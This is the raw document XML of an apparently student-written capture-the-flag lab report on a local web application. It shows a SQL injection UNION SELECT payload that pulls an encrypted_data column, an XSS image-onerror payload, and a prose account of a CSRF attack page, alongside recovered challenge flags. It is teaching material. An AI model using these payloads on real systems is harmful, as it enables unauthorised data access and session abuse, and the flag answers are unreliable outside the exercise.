    <w:p w14:paraId="756FDD45" w14:textId="781FACAD" w:rsidR="00E06A21" w:rsidRPr="00CE476B" w:rsidRDefault="00E06A21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72306EAB" wp14:editId="1BAC5AF7">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22194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472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675F" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB6BE9E" w14:textId="51453753" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>And using the hints got this from “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">” table by accessing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>encrypted_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292273CE" w14:textId="3C0C6E4A" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">query: %' UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>encrypted_data,'b','c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4AA33" w14:textId="78E468F4" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3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6D9B42F6" wp14:editId="4DFB0F81">
            <wp:extent cx="5498275" cy="3098066"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="142775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568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1085" cy="309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FB56" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="93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F172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0"/>
        <w:gridCol w:w="3634"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00CE476B" w14:paraId="10D39EF8" w14:textId="6332B326" w:rsidTr="00B55082">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FF5E65D" w14:textId="3646FDCB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Flags Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0F9E09" w14:textId="5C7088CF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 xml:space="preserve"> CORRECT?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00CE476B" w14:paraId="4E1E2882" w14:textId="112E81F5" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73819AD7" w14:textId="200DAC52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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Keep_looking_elsewhere</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="403C60CE" w14:textId="72CFED67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496AB3" w:rsidRPr="00CE476B" w14:paraId="1F16A491" w14:textId="675A9FA4" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50002FA8" w14:textId="77777777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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Not_the_real_flag_here</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AAB4A7F" w14:textId="5BC01419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496AB3" w:rsidRPr="00CE476B" w14:paraId="074C2331" w14:textId="38559D8A" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AA92878" w14:textId="77777777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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Nice_try_Kiddo_Now_try_next</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478981D6" w14:textId="306E4108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YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00CE476B" w14:paraId="6A103EF5" w14:textId="0146CC42" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1902945F" w14:textId="77777777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FLAG{Trust_me_its_false_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1416A777" w14:textId="6FBA5E49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496AB3" w:rsidRPr="00CE476B" w14:paraId="0ABC70C0" w14:textId="44234F81" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0A3047" w14:textId="77777777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FLAG{Trust_me_its_ture_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19ADF3F3" w14:textId="56952E3F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</w:tbl>
    <w:p w14:paraId="123C55E8" w14:textId="5BF4A9C3" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3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2FDA5D8F" wp14:editId="7628CB69">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="877861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619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762E" w14:textId="77777777" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72448AA6" w14:textId="77777777" w:rsidR="00610957" w:rsidRDefault="009F235B" w:rsidP="00DB0B15">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc215147290"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">03 SQLi blind </w:t>
      </w:r>
      <w:r w:rsidR="00DB0B15" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- It's a blind SQL.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00DB0B15" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EACEF8E" w14:textId="16A27A8F" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="00DB0B15" w:rsidP="00610957">
      <w:r w:rsidRPr="00CE476B">
        <w:t>It doesn't show error msg, or expected query upon</w:t>
      </w:r>
      <w:r w:rsidR="0060191D" w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72059A12" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00CE476B" w:rsidRDefault="00496AB3" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2876245C" w14:textId="77777777" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009F235B" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404F6265" w14:textId="69FDE78B" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009C74C2" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>I couldn’t do this one and I think I forgot to push my attempts of this one lol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F78F5A" w14:textId="59DE8F01" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0230ACA0" w14:textId="66A2303C" w:rsidR="00637DCA" w:rsidRDefault="009F235B" w:rsidP="008A2D80">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc215147291"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>04</w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00E30DC3" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00637DCA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6F32ABA2" w14:textId="73FB13BA" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="00E30DC3" w:rsidP="00637DCA">
      <w:r w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2D80" w:rsidRPr="00CE476B">
        <w:t>The site features a public comment or feedback section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A210110" w14:textId="77777777" w:rsidR="009F235B" w:rsidRPr="00CE476B" w:rsidRDefault="009F235B" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FFCDD6" w14:textId="77777777" w:rsidR="00F02B32" w:rsidRPr="00CE476B" w:rsidRDefault="00F02B32" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BDC053" w14:textId="1881A58E" w:rsidR="00F02B32" w:rsidRPr="00CE476B" w:rsidRDefault="00F02B32" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Honestly this one just worked with anything…</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>it tried both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>message :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>message: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>="alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>window.challengeFlags.xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>)"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>and got the same flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Nothig_is_for_free</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAACD1A" w14:textId="77777777" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CAB6849" w14:textId="77777777" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Here's the screenshots of me testing it out and confirming the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A45B8B" w14:textId="4F20E985" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180B6508" wp14:editId="16CC919D">
            <wp:extent cx="5928360" cy="3337560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="148729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BD8CC" w14:textId="77777777" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F77813B" w14:textId="76FB1458" w:rsidR="00C72DCE" w:rsidRPr="00CE476B" w:rsidRDefault="00C72DCE" w:rsidP="009F235B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194862F1" wp14:editId="17688CA1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="192509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980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577C" w14:textId="0CAE4A80" w:rsidR="00CE476B" w:rsidRPr="00CE476B" w:rsidRDefault="00CE476B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F8254" w14:textId="153FB13A" w:rsidR="00CE476B" w:rsidRPr="00CE476B" w:rsidRDefault="00CE476B" w:rsidP="00960636">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc215147292"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">05 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>CSRF Task – Cross-Site Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:t>Forgery (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="317791C8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Inspected the vulnerable page using Browser Developer Tools (Elements/Sources).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53206126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Identified a hidden &lt;script&gt; block that exposed the flag directly on the client side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BD130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 xml:space="preserve">Recovered the flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Security_is_illusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD4E4DF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Demonstrated the CSRF exploit by creating a malicious attack.html page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D0EF6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The malicious page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C13C5F1" w14:textId="77777777" w:rsidR="00CE476B" w:rsidRP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Displays an innocent-looking message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D6879" w14:textId="77777777" w:rsidR="00CE476B" w:rsidRP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Contains a hidden POST form targeting http://localhost:5000/csrf/update-email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDAD17" w14:textId="77777777" w:rsidR="00CE476B" w:rsidRP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Auto-submits the form when the user clicks anywhere on the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A641F8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Screenshots included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D8F2D" w14:textId="77777777" w:rsid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The visible front-end interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB802C3" w14:textId="262DAE36" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F056FE" wp14:editId="7BB5B237">
            <wp:extent cx="4621576" cy="2602633"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="13931742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413" cy="260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0E495" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EE22DA" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRPr="00CE476B" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AA8126" w14:textId="77777777" w:rsid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The &lt;script&gt; section containing the exposed flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C266144" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB865DC" w14:textId="0B082C0F" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080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4ED64736" wp14:editId="0EC376EA">
            <wp:extent cx="4649118" cy="2618143"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16652895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947" cy="262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7E0C" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRPr="00CE476B" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46295370" w14:textId="77777777" w:rsid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The hidden CSRF attack form inside attack.html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C3532" w14:textId="3CCCEFC1" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF2B405" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02D4BD74" wp14:editId="17721605">
            <wp:extent cx="5111827" cy="2878717"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19802720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838" cy="288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33DCD" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1AF1A7" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B57048" w14:textId="6DD2294F" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flag submitted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>succesfully</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E8495A1" w14:textId="1EC6C25B" w:rsidR="00A46DAF" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080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692EABC1" wp14:editId="6A4773F3">
            <wp:extent cx="4759287" cy="2680185"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="17562043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415" cy="268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6A4B8" w14:textId="77777777" w:rsidR="00A46DAF" w:rsidRPr="00CE476B" w:rsidRDefault="00A46DAF" w:rsidP="00A46DAF">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A72D837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Concluded that the application lacked proper CSRF protection and leaked sensitive data in the frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156CDA75" w14:textId="77777777" w:rsidR="00DB0B15" w:rsidRPr="00CE476B" w:rsidRDefault="00DB0B15" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1051E9" w14:textId="77777777" w:rsidR="00DB0B15" w:rsidRDefault="00DB0B15" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF369FE" w14:textId="77777777" w:rsidR="005409F1" w:rsidRDefault="005409F1" w:rsidP="009F235B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
